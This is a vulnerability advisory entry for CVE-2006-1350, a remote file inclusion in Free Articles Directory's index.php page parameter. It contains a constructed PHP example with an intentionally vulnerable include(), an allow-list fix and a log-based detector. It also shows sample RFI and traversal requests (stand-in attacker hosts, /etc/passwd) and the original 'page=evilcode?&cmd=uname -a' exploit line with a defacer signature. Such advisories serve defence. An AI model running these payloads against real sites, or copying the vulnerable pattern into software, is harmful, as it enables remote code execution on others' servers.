Free Articles Directory index.php page Parameter Remote File Inclusion Vulnerability

Vulnerability ID: 1195661
Vulnerability type: Input validation
Published: 2006-03-21
Updated: 2006-03-23
CVE ID: CVE-2006-1350
CNNVD ID: CNNVD-200603-364
Platform: N/A
CVSS score: 7.5
|Vulnerability source
https://cxsecurity.com/issue/WLB-2006030104
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-364
|Vulnerability details
index.php in Free Articles Directory from 99Articles.com (also known as ArticlesOne.com) contains a PHP remote file inclusion vulnerability: a remote attacker can include and execute arbitrary PHP code by supplying a URL in the page parameter.
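The following is an added example, not the Free Articles Directory code itself: it shows the kind of include() pattern that produces a vulnerability of this class beside a hardened version that resolves the page parameter through a fixed allow-list, plus a small check that flags exploitation attempts in access-log entries. Function names, the template map, and the sample request lines are constructed for the example (PHP 8 syntax).

```php
<?php
// Constructed example around CVE-2006-1350: a request-controlled value reaching
// include(). This is not the project's own source.

// Vulnerable pattern. If the request value is passed to include(), then with
// allow_url_include/allow_url_fopen enabled (PHP 4/5 defaults of that era)
// ?page=http://attacker.invalid/x pulls and runs remote code; with them off it is
// still a local file inclusion. Appending a fixed suffix does not fix this.
function render_page_vulnerable(string $page): void
{
    include($page . '.php');   // attacker controls the path
}

// Hardened version: the request value is only a key into a fixed map of
// templates. Nothing from the request is ever concatenated into a path.
const PAGE_TEMPLATES = [
    'home'       => 'pages/home.php',
    'articles'   => 'pages/articles.php',
    'authors'    => 'pages/authors.php',
    'categories' => 'pages/categories.php',
];

function resolve_page(string $page): ?string
{
    return PAGE_TEMPLATES[$page] ?? null;   // exact-key lookup, no normalisation
}

function render_page_hardened(string $page): void
{
    $template = resolve_page($page);
    if ($template === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include __DIR__ . '/' . $template;
}

// Detection side: run the same allow-list idea over request URIs taken from the
// web server access log to spot attempts against an unpatched install.
function looks_like_rfi_attempt(string $request_uri): bool
{
    $query = parse_url($request_uri, PHP_URL_QUERY);
    if (!is_string($query)) {
        return false;                       // no query string at all
    }
    parse_str($query, $params);             // also URL-decodes (%00 -> NUL)
    $page = $params['page'] ?? '';
    if (!is_string($page)) {
        return true;                        // page[]=... array smuggling
    }
    // A URL scheme, a traversal sequence or a NUL byte in `page` is never
    // legitimate for this parameter; anything outside the allow-list is suspect.
    return preg_match('#^[a-z][a-z0-9+.-]*:#i', $page) === 1
        || str_contains($page, '..')
        || str_contains($page, "\0")
        || resolve_page($page) === null;
}

// Constructed sample request lines (not real log data).
$samples = [
    '/index.php?page=articles',
    '/index.php?page=http://example.invalid/shell.txt?',
    '/index.php?page=../../../../etc/passwd%00',
];
foreach ($samples as $uri) {
    printf("%-55s %s\n", $uri, looks_like_rfi_attempt($uri) ? 'SUSPECT' : 'ok');
}
```

The allow-list is the actual fix; the scheme and traversal checks in looks_like_rfi_attempt() are only there to make log triage readable, since a resolve_page() miss alone would also flag harmless typos. Disabling allow_url_include in php.ini is a defence in depth for the remote variant but does not close the local inclusion path, which is why the include target must never be derived from request data.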
|Vulnerability EXP
Web Site : http://www.99articles.com
Script Demo Site : http://www.articlesone.com

General :

1. Supports RSS feed (XML) to distribute articles to other websites and blogs. It will grow website popularity.

2. Newsletter to grow visitors

3. Membership system for writer participants to submit their articles

4. Top Articles list, Top Authors list, Most Popular Articles list

5. Article categories

6. Search engine friendly. PHP generates article pages as HTML, etc.

Admin :

1. Web-based control panel

2. Categories management

3. Articles management --> You can approve articles from writer

4. Search members and articles

5. Static page editor

6. Re-brand your website, change logo and website name

7. Easily integrated with Google AdSense to earn money

8. Two-level user management. Create a super admin to handle everything and create admins to approve articles.

Vulnerable :

http://www.example.com/index.php?page=evilcode?&cmd=uname -a

Patriotic Hackers in the name of Botan

Kurdish Defacerz ruLez.

www.PatrioticHackers.com

irc.gigachat.net #kurdhack
|References

Source: BUGTRAQ
Name: 20060321FreeArticlesDirectoryRemoteCommandExucetion
Link: http://www.securityfocus.com/archive/1/archive/1/428354/100/0/threaded

Source: XF
Name: freearticlesdirectory-index-file-include(25378)
Link: http://xforce.iss.net/xforce/xfdb/25378

Source: BID
Name: 17183
Link: http://www.securityfocus.com/bid/17183

Source: OSVDB
Name: 24024
Link: http://www.osvdb.org/24024

Source: VUPEN
Name: ADV-2006-1037
Link: http://www.frsirt.com/english/advisories/2006/1037

Source: SREASON
Name: 616
Link: http://securityreason.com/securityalert/616

Source: SECUNIA
Name: 19320
Link: http://secunia.com/advisories/19320

Source: VIM
Name: 20060322FreeArticlesDirectory-fileinclusion,codeexecution?
Link: http://attrition.org/pipermail/vim/2006-March/000626.html